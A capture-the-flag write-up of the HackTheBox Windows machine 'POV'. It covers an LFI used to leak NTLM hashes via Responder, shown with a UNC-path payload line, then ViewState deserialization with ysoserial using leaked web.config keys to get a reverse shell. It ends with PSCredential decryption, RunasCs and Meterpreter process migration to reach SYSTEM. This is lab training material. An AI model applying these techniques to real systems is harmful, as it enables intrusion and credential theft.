search
Page cover
githubEdit

🟨POV

IP: 10.10.11.251 - Platform: Windows - Difficulty: Medium

hashtag
RECON

hashtag
Nmap

nmap reveals that only port 80 is open. That is kinda strange for a typical machine seen on HTB. Most of the boxes tend to open port 22 (or commonly refer as SSH) as a way to remote access as user or root. The usual approach would be to grab the creds through some nefarious ways then log in SSH creds. 


map -sV -sC -v -T4 10.10.11.251

PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 10.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-title: pov.htb
|_http-server-header: Microsoft-IIS/10.0
|_http-favicon: Unknown favicon MD5: E9B5E66DEBD9405ED864CAC17E2A888E
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

hashtag
FFUF

Using ffuf to search for subdomains that respond different with code 200/300

Only 1 subdomain returns 302 - dev. Let add it into /etc/hosts.

hashtag
GAINING FOOTHOLD

Image taken from dev.pov.htb

pov.htb provides no indication of a possible attack vector. However, in dev.pov.htb, I stumbled upon LFI (Local File Incursion) when examining the parameters in the intercepted package in Burpsuite while tinkering with the web download function.

circle-info

File Inclusion vulnerability allows an attacker to include a file, usually exploiting a “dynamic file inclusion” mechanisms implemented in the target application. The vulnerability occurs due to the use of user-supplied input without proper validation.

This can lead to something as outputting the contents of the file, but depending on the severity, it can also lead to:

  • Code execution on the web server

  • Code execution on the client-side such as JavaScript which can lead to other attacks such as cross site scripting (XSS)

  • Denial of Service (DoS)

  • Sensitive Information Disclosure

Jackpot!
Finding interesting data when navigating back to the machine's hosts file

It took some time to find a few intriguing files:

  • default.aspx

  • web.config

  • contact.aspx

hashtag
LFI & Responder

Now what we are going to do here is we are going to capture the NTLM hash by using Responder

circle-info

Responder will poison MDNS, NBT-NS, and LLMNR. And you might be asking?

What is LLMNR, NBT-NS, MDNS? The functions of the protocols LLMNR, NBT-NS, and MDNS are nearly identical.

  • Based on the Domain Name System packet format, LLMNR (Link-Local Multicast Name Resolution) is a protocol that supports all current and upcoming DNS formats, types, and classes and permits IPv4 and IPv6 hosts.

  • A Net BIOS protocol called NBT-NS (Net BIOS Name Service) is used on Windows OS to convert NetBIOS names to IP addresses.

  • Finally, all of the network's participants are addressed directly via the MDNS (Multicast Domain Name Service) protocol.

If reading this is too tedious for you, just know that, Responder would attempt to obtain your NTLM hashes from the network in plain text. If you're lucky, this tool might give you a clear text username and password in addition to the password hash.

Crafting a payload for Responder to catch!

file=%5C%5C10.10.X.X%5Csomefile

Our payload basically is \\10.10.X.X\somefile wrap in URL encoding.

And this is the dead end because this hash is uncrackable. :<

hashtag
ViewState Deserialization Exploit

hashtag
An overview of the approach

Taking a look at web.config reveals some juicy info

So let's talk about ViewState for a little bit:

The ASP.NET framework's default method for maintaining page and control values across web pages is called ViewState. The current state of the page and any values that must be kept during postback are serialized into base64-encoded strings and output in the ViewState hidden field or fields when the HTML for the page is rendered.

Because of its connection to the way ASP.NET handles ViewState creation and processing through the use of the ObjectStateFormatter for serialization and deserialization, ViewState by itself isn't a problem; rather, ASP.NET's encryption and signature for serialized data could be compromised.

Attackers could create malicious payloads that imitate authentic ViewState by taking advantage of deserialization flaws in ObjectStateFormatter, thanks to exposed algorithms or keys.

-> In this case, we could leverage the leak of encryption and signature keys obtained from web.config file.

A list of scenarios where ViewState Deserialization flaws could be exploited

Luckily, the .NET deserialization tool ysoserialarrow-up-right includes a ViewState-specific feature. Vulnerabilities in ObjectStateFormatter deserialization are caused by its use of known keys and algorithms to impersonate ViewState encryption and signatures.

hashtag
Cracking the nut

With ASP.NET framework ≥ 4.5, we need to supply the decryption algorithm and the decryption key to the ysoserial:

Crafting a serialized payload

In this example, we will be using a simple PowerShell Reverse Shell encoded in Base64:

Then, serialized it by ysoserial :

Finally, after replacing the URL encoded value of the generated payload with the value of the __VIEWSTATE in the above-mentioned request, our payload will be executed.

Plug-in our payload!

Now, we have gained a shell as POV\sfitz

Got da shell!!

hashtag
PRIVILEGE ESCALATION

hashtag
Enumeration

Getting users SID:

So sfitz lacks the privilege to receive the user flag; perhaps alaading does?

After a bit of exploring, I find this file:

Stumble upon a PSCredential file
circle-info

Password, Pa$$w0rd, P455w0rd!!!

Can I access the password directly from the PSCredential object?

  • As you can see, it’s stored as a secure string.

  • The password will not be returned to you in plain text by $cred.Password.

  • As opposed to a password in plain text, $cred.Password|Convertfrom-SecureString will ONLY provide you with cipher data.

The GetNetworkCredential() method is a feature of the PSCredential object. This technique can be used to decrypt the password stored in the PSCredential object.

When I invoke this method and do Get-Member, it will show you the properties of the object and you will find a property called Password. Use the command $cred.GetNetworkCredential().Password and it will return the password in plain text.

We could directly parsing from XML:

Using the given credential, we would be using a PowerShell script to trigger a reverse shell:

Boom?!

Now we are alaading

hashtag
Gaining shell as Administrator

Checking the privilege of POV\alaading:

hashtag
Understanding about SeDebugPrivilege

By itself, SeDebugPrivilege gives a process the ability to view and modify the memory of other processes. Regardless of security descriptors, SeDebugPrivilege grants the token bearer access to any process or thread.

circle-info

It's important to remember that attackers frequently enable this privilege in order to gain greater access to thread and process objects. Many C2 agents come with built-in code that allows you to do this instantly. Because it allows the creation of new remote threads in a target process, malware also takes advantage of this privilege to perform code injection into otherwise trustworthy processes.

As we could see on this machine, alaading does not have SeDebugPrivilege enabled. So, to bypass this, we could import RunasCsarrow-up-right.

RunasCs is a tool that allows you to use explicit credentials to run particular processes with permissions different from what our shell current provides.

As you can see below, RunasCs enables a list of privileges for a specific security token.

We would use it to spawn another shell:

Catch it with nc:

Getting a new shell with RunasCs

Checking on the privilege info reveals suprising discovery:

With SeDebugPrivilege enabled, we can upload a Meterpreter shell to the machine and gain leverage access as Administrator.

Crafting our payload

To get the malicious payload onto the target computer, host it on a Python http.server and then use:

Finally, execute it by:

And voilà!!

We got the shell.

Now, one of the oldest tricks on the book is to migrate into another Windows processes:

circle-info

There are many cases where you need to "migrate" a specific Windows working process, typically a shell.

  • An unstable shell.

  • Migrate from a 32-bit process to a 64-bit process.

  • Dealing with exploits require an interactive session.

This can be easily completed if you have a Meterpreter shell. All you have to do is wait for process migration to occur after launching the "migrate" command with the PID specified. In technical terms, by creating a thread inside another process, this is more of a malicious code injection than a true migration, and Meterpreter is exceptional at doing this. It creates a new remote thread and injects your current session into it, along with all of your loaded extensions and configurations.

By migrating into a more privileged process, we should be able to gain NT AUTHRITY:

Lastly, take the PID and let Meterpreter handle everything:

Avada Kedavra 🎉

circle-info

It is also possible to migrate into winlogon, explorer

There is a port open for localhost, so another possible approach is to port forwarding by using chiselarrow-up-right then evil-winrmarrow-up-right (or Cobalt Strike, Sliver, Havoc C2)

H4v3 fun ^^

hashtag
RESOURCES

PreviousJourney to Certified Red Team Operator (CRTO)NextSKYFALL

Last updated